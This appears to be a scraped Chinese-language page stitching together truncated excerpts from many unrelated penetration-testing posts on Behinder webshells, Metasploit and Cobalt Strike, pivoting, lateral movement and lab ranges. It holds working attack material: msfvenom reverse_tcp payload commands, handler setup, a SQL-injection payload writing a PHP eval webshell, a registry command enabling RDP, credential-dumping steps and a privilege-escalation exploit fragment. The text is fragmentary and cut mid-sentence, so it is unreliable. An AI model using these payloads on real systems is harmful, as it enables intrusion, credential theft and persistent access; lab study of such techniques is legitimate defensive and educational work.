1.冰蝎介绍 冰蝎是一款目前比较流行的Webshell管理工具,在2021年更新的2021.4.20 v3.0 Beta 9 版本中去除了动态密钥协商机制,采用预共享密钥,载荷全程无明文.因其优秀的加密传输特性,被攻击者广泛采用.冰蝎相较其它Webshell管理工具,具备如下优点:支持跨平台运行.多采用加密传输.版本更新频繁等.目前冰蝎已更新到2021.4.20 v3.0 Beta 9 ,新版本增加了Java内存马注入.支持多种Web容器.反向DMZ等功能.  2.实验 通过获取内网中的主机sh…
环境 漏洞详情 (qiyuanxuetang.net) 仅主机模式内网网段192.168.183.0/24 外网网段192.168.157.0/24 其中Ubuntu作为对外的内网机器 攻击机kali地址:192.168.157.129  悬剑:192.168.157.130 还需要进入ubuntu开启服务,密码ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045vsudo docker-compose up -d cd /home/ubunt…
进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f meterpreter模式 1.输入screenshot截个图看看主人在干什么吧. 2.wdigest //抓取明文密码(需加载m…
感谢: perl6大佬分享的姿势. MSF: msf > use payload/php/bind_phpmsf exploit(handler) > set PAYLOAD payload/php/bind_phpmsf exploit(handler) > set RHOST 目标内网ipmsf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之后就会在f盘生成xishaonian.php脚本一般都是需要修改…
前言 买了个便宜的 vps , 在上面装 msf 也装不上,于是想着把端口映射到内网来. 正文 拓扑如下: 首先在内网主机 B ssh -fCNR 7281:localhost:5000 root@C_IP 执行完后会把 B:5000 反弹到 C_IP:7281.此时 C 监听 127.0.0.1:7281 然后然后在 公网中转服务器 C ssh -fCNL *:5586:localhost:7281 localhost 将*:5586--->localhost:7281 此时 C监听 0.0.…
目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为  image/jpeg 上传大马之后发现目标是linux系统 尝试反弹一个shell成功了是www权限 查看内核版本如下 上传对应的cve进行提权 脚本如下: #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sche…
这里只做记录,不做详解 0x01 路由转发 已经拿到一台公网服务器: 1.1 方法1 进到meterpreter的会话: route #查看路由信息 background退出当前会话,通过会话2,转发172.17.0.0这个路由 route add 172.17.0.0 255.255.0.0 2 #添加路由至本地 route print #打印当前路由信息 到这里 pivot 已经配置好了,在 msf 里对 172.17.0.1 进行扫描(db_nmap)或者访问(psexe 模块,ssh 模…
第一步 Cobalt strike 派生 shell 给 MSF(前提有个beacon shell) 第二步 选择要派生的beacon,右键-->增加会话,选择刚刚配置的foreign监听器 第三部 msf msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_t…
年初九 天公生 0x034 MSF(美少妇) 启动msf msfconsole 先启动msf依赖的postgresql数据库 初始化数据库 msfdb init (要用普通用户) msf路径 /usr/share 制作后门 msfvenom msfvenom -p payload脚本 lhost=监听/攻击机ip lport=端口 -f 文件类型 -o 文件名 linux示例 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.…
年初六 六六六 MSF和cs联动 msf连接cs 1.在队伍服务器上启动cs服务端 ./teamserver 团队服务器ip 连接密码 2.cs客户端连接攻击机 填团队服务器ip和密码,名字随便 msf将session发往cs客户端 1.cs设置监听 监听器 - add 选择payload类型和填攻击机ip,端口要对应payload类型 2.进入payload注入模块 use exploit/windows/local/payload_inject 3.设置参数 set disablepaylo…
当我们通过代理可以进入某内网,需要对内网主机的服务进行探测.我们就可以使用MSF里面的内网主机探测模块了. 在这之前,先修改 /etc/proxychains.conf ,加入我们的代理. 然后 proxychains msfconsole 启动MSF,这样,我们的MSF就可以探测内网主机了. 或者是在MSF里面添加0.0.0.0/24的路由,这样,只要被控主机可以到达的地址,我们也就可以探测! MSF的search支持type搜索: search scanner type:auxiliary…
内网渗透-横向移动 #建立ipc连接并将后门添加至计划任务 前置条件:获取到某域主机权限->得到明文或者hash,通过信息收集到的用户列表当做用户名字典->用得到的密码明文当做密码字典 本次移动流程:尝试建立连接(ipc)->创建计划任务(at|schtasks)->执行命令,上传后门 什么是IPC? IPC(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的…
前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>&…
其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例. 一.准备工作 1.安装了Msf的公网主机+Ubuntu系统 2.一台其他服务器内网存在445漏洞 3.细心,细心,细心,钻研,钻研!!! 二.反弹一个shell 第一步:公网主机操作 生成msf木马: msfvenom -p windows/meterpret…
@Webkio 前言: 最近在跟朋友搞一些项目玩,所以最近没怎么更新内容接下来我将在虚拟中模拟内网多层靶场,进行内网渗透实验,超详细,适合小白.本文仅供网安学习,不可利用于未授权渗透工作中,否则后果自负.码字截图不易,转载记得署名. 微信关注公众号: JiuZhouSec 不定期更新渗透干货,适合小白学习.九州大地,一起Dayday UP! 模拟内网靶场 进行内网实验 我将从以下几点简述:[上线边界机器]-[内网渗透]-[横向移动]-[痕迹清除] 实验码字不易,转载文章请署名 实验对象 这边基于…
在内网渗透方面,最为大众所知道的就是xp系统的ms08067漏洞,通过这个漏洞可以对未打上补丁的xp系统实现getshell, 但是经过笔者发现,这种漏洞攻击在被攻击机开上windows防火墙的时候是没用的(连ping都会被拒绝),但是arp+dns欺骗仍然是可行的 那么问题来了,我们如何通过内网欺骗来getshell? 在被攻击机开启防火墙的时候,可以看到使用ms08067漏洞未能成功利用 但是由于是内网的特性,因此我想到利用dns欺骗结合metasploit进行渗透测试. 首先内网的arp欺…
前言:当我们在渗透当中首先拿到webshell权限,进一步提权渗透,获得内网的主机,假设在这里我们获取了具有双网卡的web服务器,我们的目的是通过这台web服务器,进行内网漫游,获取内网中其他主机的系统shell,以此达到漫游的目的. 1.实验环境 web服务器:192.168.4.129   1.1.1.12 域控服务器: 1.1.1.11 防火墙: 1.1.1.1 黑客(kali):192.168.4.136 2.我们获得webshell权限后,一般会上传远程木马,进行反向连接(内网与外网之…
0x00 前言 在去年小菜鸡学了点内网知识就闲着没事跑点jboss的站看看,在经历过很多次内网横向失败之后终于算是人生圆满了一把,阿三的站一般进去之后很难横向,不知道是不是我太菜的原因,反正阿三的站能够横向拿完的有且仅有这么一个,过了很久再放出来应该是没啥大问题了吧,希望师傅们友好交流 0x01 外围打点 首先对发现了该站点的JBoss页面,经过测试发现具有JBoss反序列化漏洞 这里我用的是war远程部署的方法拿到了一个shell 这里看到对方是windows系统,当前用户权限是管理员权限.并…
Ladon LadonGUI Cobalt Strike PowerLadon PythonLadon LinuxLadon 使用说明 ID 主题 URL 1 Ladon文档主页 https://github.com/k8gege/Ladon/wiki 2 基础用法详解 https://github.com/k8gege/Ladon/wiki/Ladon-Usage 3 Cobalt Strike https://github.com/k8gege/Aggressor 4 Exp生成器使用 ht…
因为冰蝎也是使用 JAVA 写的跨平台应用程序,我们可以借助 macOS 自带的 自动操作 automator.app 来创建一个应用程序. 前言: 冰蝎是一种新型的Webshell连接工具,在日常的红蓝对抗中红方经常,只要将冰蝎的马上传到服务器并能够成功访问,那就可以执行诸多实用的功能 PS:最近一次红蓝某BAT中的一家便使用了冰蝎,绕过一些主流厂商的shell检测(不过应该是他们内部有过修改)成功攻进了企业内网并进行了横向.这也是因为只要在上传冰蝎码时和密匙协商建立连接的时候流量分析设备不能…
写在前面 近期冰蝎更新了内网穿透模块中的一些功能,有不少朋友不知道参数怎么填,希望能出一个使用指导手册,就借这个机会写一个"说明书"(文中有大量演示动图,请耐心等待加载). 基本信息 由于冰蝎采用了会话加密,所以客户端首次和服务端通信会有一个协商的过程(v3.0之后的版本不存在密钥协商过程),成功建立连接后,会把服务器侧的一些基本信息,显示在这个Tab页. 命令执行 这里的命令执行提供非交互式的命令执行,常规功能,不再赘述. 虚拟终端 虚拟终端提供一个交互式的真实终端,相当于把服务器侧…
最近发现了一个内网的靶场网站,简单配置一下网络就可以,不用自己搭建这么麻烦漏洞信息 (qiyuanxuetang.net) 环境配置 内网1靶场由三台机器构成:WIN7.2008 server.2003 server 其中WIN7做为对外的web机,2008作为域控 WIN7添加一个网卡,一个设为仅主机,一个设为NET 2003.2008 设为仅主机 初始密码hongrisec@2019 信息收集 深入探测 80端口和3306端口 ,查看80端口 一个phpstudy的探针界面,一般来说后台登陆…
环境配置 内网2靶场由三台机器构成:WIN7.2008 server.2012 server 其中2008做为对外的web机,win7作为个人主机可上网,2012作为域控 网络适配器已经设置好了不用自己设置 初始密码1qaz@WSX WEB主机初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX ,然后修改WEB\de1ay的密码 注意需要手动开启服务,在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个…
Vulnstack内网靶场3 (qiyuanxuetang.net) 环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行. 挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip. 除重新获取ip,不建议进行任何虚拟机操作. 添加一个网络,配置如下,该网络为内部网络 目标:域控中存在一份重要文件. 本次环境为黑盒测试,不提供虚拟机账号密码. kali 攻击机ip 192.168.1.64 外网主机信息收集 nmap -sV…
Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的.本片文章将从拿到一个Linux shell开始,介绍Linux内网渗透技术,分为容器逃逸.Linux提权.Linux信息收集.Linux隧道技术.Linux横向移动.Linux权限维持.Linux痕迹清理几个部分. 容器逃逸 容器逃逸的应用主要是,拿到shell之后,发现是docker环境,要进一步渗透,就必须逃逸到宿主机. 容器逃逸方法见: https://www…
声明:本文具有一定攻击性,仅作为技术交流和安全教学之用,不要用在除了搭建环境之外的环境. 0×01 题记 又是一年十月一,想到小伙伴们都纷纷出门旅游,皆有美酒佳人相伴,想到这里,不禁潸然泪下.子曰:"长得丑就要多读书!"于是有了这篇文章. 0×02 简要介绍 这篇文章的主要目的是介绍一下一个最新的中间人攻击测试框架 – MITMf.工具的作者是byt3bl33d3r,是基于代理工具sergio-proxy修改而来.这里是工具的地址: https://github.com/byt3bl3…
Tunna和reduh原理一样.. 使用方法: 上传源码包中文件夹webshell下的脚本至网站目录 然后本地进行连接上传的webshell即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -r 3389 -v 这样就转发了webshell所在主机的3389到你本地的1234上,本地直接远程127.0.0.1:1234即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a…
from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一:生成php反弹脚本msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php 将文件传入shell中,在msf中开一个handlermsf > use multi/handlermsf exploit(handler) > set PAYLOAD php/rever…
1.Netbios and LLMNR Name Poisoning 这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\drivers\etc\hosts),DNS服务器,NetBIOS广播,如果前2个请求失败,则在本地发送NetBIOS广播请求,此时任何本地网络的系统都能回答这个请求,使用SpiderLabs出品的Responder工具,能够在不借助ARP欺骗的情况下,响应这个请求.其实metasploit也能利用(…
总体说起来,Backbox内置的工具什么的,并不是很多,但是它集成了一些用起来很棒的工具. 比如:Beef.Sqlmap.wpscan.zenmap.msf.w3af.dns嗅探等一系列工具,传说中的:取其精华去其糟粕? 我自认为BackBox的一些好处: 1.自带FireFox浏览器 2.自带Beef 3.自带Ubuntu软件中心 4.可选化更新软件,拒绝臃肿更新! 5.渗透测试工具都是最理想化的工具,拒绝糟粕! 6.基于Ubuntu,易于操作可拓展性强. 如果选择一款理想化的渗透测试Linu…